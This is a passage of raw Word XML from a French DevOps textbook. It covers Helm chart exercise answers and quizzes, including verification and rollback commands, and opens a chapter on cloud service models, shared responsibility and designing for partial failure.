      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># values.yaml</w:t>
        <w:br/>
        <w:t>replicaCount: 2</w:t>
        <w:br/>
        <w:t>image:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  repository: registry.exemple.fr/equipe/app</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tag: "1.4.2"</w:t>
        <w:br/>
        <w:t>service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  port: 80</w:t>
        <w:br/>
        <w:t xml:space="preserve">  targetPort: 3000</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérification</w:t>
        <w:br/>
        <w:t>helm lint mon-service</w:t>
        <w:br/>
        <w:t>helm template mon-service ./mon-service | grep -A3 "kind: Deployment"</w:t>
        <w:br/>
        <w:t>helm install api ./mon-service --dry-run --debug | head -40</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>helm template</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> produit le YAML final sans rien installer : c'est l'outil de vérification principal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un chart trop paramétrable devient un langage à lui seul : trois valeurs suffisent pour démarrer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 69.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>helm history api -n production</w:t>
        <w:br/>
        <w:t># REVISION  STATUS     CHART             DESCRIPTION</w:t>
        <w:br/>
        <w:t># 3         deployed   mon-service-1.4.2 upgrade</w:t>
        <w:br/>
        <w:t># 2         superseded mon-service-1.4.1 upgrade</w:t>
        <w:br/>
        <w:br/>
        <w:t>helm rollback api 2 -n production --wait</w:t>
        <w:br/>
        <w:t>helm status api -n production</w:t>
        <w:br/>
        <w:t>kubectl rollout status deployment/api -n production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le retour arrière Helm restaure les manifestes de la révision précédente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite de considérer le retour terminé avant que les pods soient prêts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 69.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Besoins : chiffrement interne, traçabilité, tests de panne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Coût : un plan de contrôle, des proxys par pod, une courbe d'apprentissage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Décision : commencer par un ingress et des métriques ; envisager le mesh quand les tests de panne deviennent réguliers.</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 fichier contient les valeurs par défaut d'un chart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Chart.yaml</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values.yaml</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NOTES.txt</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_helpers.tpl</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--atomic</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Installe plus vite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Annule la mise à jour si elle échoue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Supprime le chart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Garde les valeurs</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Qu'ajoute un service mesh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 proxy par pod</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Une base de données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Un ingress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Un registre</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Quand adopter un service mesh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Dès le premier service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Quand un besoin identifié le justifie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Jamais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Après Kubernetes uniquement</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Quelle commande vérifie le rendu d'un chart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helm install</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helm template</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helm list</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helm rollback</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>values.yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> porte les défauts, surchargés à l'installation.</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Helm revient à la révision précédente en cas d'échec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le proxy latéral intercepte et applique les politiques.</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Il ajoute de la complexité : il se justifie par un problème réel.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>helm template</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> produit le YAML final sans installer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>70. Modèles de cloud et architecture de référence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ce que le cloud change réellement : responsabilités partagées, coûts variables et défaillances partielles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 69</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Distinguer IaaS, PaaS, CaaS et SaaS.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Situer la responsabilité dans le modèle partagé.</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Concevoir pour la panne partielle.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Comprendre les modèles de coût.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Choisir entre plusieurs fournisseurs ou un seul.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>70.1 Quatre modèles de service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cloud n'est pas un lieu, c'est un mode de consommation. Chaque modèle transfère une partie de la responsabilité opérationnelle au fournisseur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.257 — Cinq modèles de service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192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Modèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Vous gérez</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Le fournisseur gère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1923"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IaaS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2163"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>OS, runtime, application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2764"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Matériel, réseau, virtualisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2163"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="192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CaaS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Images, configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Orchestration, nœuds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Kubernetes managé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1923"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PaaS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2163"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Code, données</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2764"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Runtime, montée en charge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2163"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plateforme applicative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="192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Serverless</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Fonction, événement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Tout le reste, à la demande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Fonction managée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1923"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SaaS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2163"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Usage et données</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2764"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2163"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Messagerie, CRM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="81" name="Picture 81"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f79.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.79 — Le modèle de responsabilité partagée</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RESPONSABILITÉ PARTAGÉE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Répartition explicite : le fournisseur sécurise l'infrastructure, le client sécurise ce qu'il y place. Une erreur de configuration reste toujours de la responsabilité du client.</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 MANAGÉ » NE SIGNIFIE PAS « SÉCURISÉ »</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une base de données managée mal configurée — accessible publiquement sans authentification — reste une fuite de données. Les incidents les plus médiatisés viennent presque toujours de configurations client, pas de défaillances du fournisseur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>70.2 Concevoir pour la panne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dans le cloud, tout échoue partiellement et en permanence : une instance, une zone, un service managé. L'architecture doit continuer à fonctionner en mode dégradé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.258 — Quatre niveaux de défaillance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82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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Défaillance typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2825"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Région</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Zone géographique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
